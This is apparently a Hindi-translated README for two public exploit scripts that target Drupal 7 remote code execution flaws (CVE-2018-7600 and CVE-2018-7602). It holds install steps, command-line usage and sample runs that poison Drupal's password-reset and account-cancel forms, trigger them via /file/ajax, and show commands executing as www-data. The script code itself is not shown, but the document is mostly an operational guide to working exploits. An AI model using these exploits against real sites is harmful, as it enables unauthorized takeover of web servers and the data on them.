
Drupal 7 <= 7.57 CVE-2018-7600 के लिए एक्सप्लॉइट
आवश्यक लाइब्रेरीज़ को इस प्रकार स्थापित करें:
pip install requests
pip install bs4
$ python3 drupa7-CVE-2018-7600.py -h
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
usage: drupa7-CVE-2018-7600.py [-h] [-c COMMAND] [-f FUNCTION] [-p PROXY]
target
positional arguments:
target लक्ष्य Drupal साइट का URL (जैसे:
http://target.com/)
optional arguments:
-h, --help यह सहायता संदेश दिखाएँ और बाहर निकलें
-c COMMAND, --command COMMAND निष्पादित करने के लिए कमांड (डिफ़ॉल्ट = id)
-f FUNCTION, --function FUNCTION आक्रमण वेक्टर के रूप में उपयोग करने के लिए फ़ंक्शन (डिफ़ॉल्ट
= passthru)
-p PROXY, --proxy PROXY प्रॉक्सी को http://127.0.0.1:8080/ प्रारूप में कॉन्फ़िगर करें (डिफ़ॉल्ट = कोई नहीं)
यह स्क्रिप्ट Drupal 7 <= 7.57 में (CVE-2018-7600) भेद्यता का शोषण करेगी,
पासवर्ड पुनर्प्राप्ति फ़ॉर्म (user/password) को विषाक्त करके और ajax के माध्यम से फ़ाइल अपलोड (/file/ajax) के साथ इसे ट्रिगर करके।
$ python3 drupa7-CVE-2018-7600.py http://target.local/
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] फ़ॉर्म को विषाक्त किया जा रहा है और इसे कैश में शामिल किया जा रहा है।
[*] विषाक्त फ़ॉर्म ID: form-xpkEuQSuJJJQ1y4Sfs8gs0zzsVdO_v_TpaJDBSehzJE
[*] निष्पादित करने के लिए शोषण ट्रिगर किया जा रहा है: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
आवश्यक लाइब्रेरीज़ को इस प्रकार स्थापित करें:
pip install requests
pip install bs4
$ python3 drupa7-CVE-2018-7602.py -h
===================================================================================
| DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602) |
| by pimps |
===================================================================================
usage: drupa7-CVE-2018-7602.py [-h] [-c COMMAND] [-f FUNCTION] [-x PROXY]
user password target
positional arguments:
user उपयोगकर्ता नाम
password पासवर्ड
target लक्ष्य Drupal साइट का URL (जैसे:
http://target.com/)
optional arguments:
-h, --help यह सहायता संदेश दिखाएँ और बाहर निकलें
-c COMMAND, --command COMMAND निष्पादित करने के लिए कमांड (डिफ़ॉल्ट = id)
-f FUNCTION, --function FUNCTION आक्रमण वेक्टर के रूप में उपयोग करने के लिए फ़ंक्शन (डिफ़ॉल्ट
= passthru)
-x PROXY, --proxy PROXY प्रॉक्सी को http://127.0.0.1:8080/ प्रारूप में कॉन्फ़िगर करें (डिफ़ॉल्ट = कोई नहीं)
यह स्क्रिप्ट Drupal 7 <= 7.58 में (CVE-2018-7602) भेद्यता का शोषण करेगी,
एक वैध खाते का उपयोग करके और खाता रद्द करने के फ़ॉर्म (user_cancel_confirm_form) को 'destination' चर के साथ विषाक्त करके
और ajax के माध्यम से फ़ाइल अपलोड (/file/ajax) के साथ इसे ट्रिगर करके।
$ python3 drupa7-CVE-2018-7602.py marcio2 teste123 http://127.0.0.1:9090/
===================================================================================
| DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602) |
| by pimps |
===================================================================================
[*] दिए गए क्रेडेंशियल का उपयोग करके एक सत्र बनाया जा रहा है...
[*] उपयोगकर्ता ID ढूंढा जा रहा है...
[*] उपयोगकर्ता ID मिली: user/4
[*] 'destination' का उपयोग करके फ़ॉर्म को विषाक्त किया जा रहा है और इसे कैश में शामिल किया जा रहा है।
[*] विषाक्त फ़ॉर्म ID: form-hKyeyIYxk-e4qT1sdZ6nWHq0xuHcH2BMWk3vMWaSExU
[*] निष्पादित करने के लिए शोषण ट्रिगर किया जा रहा है: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)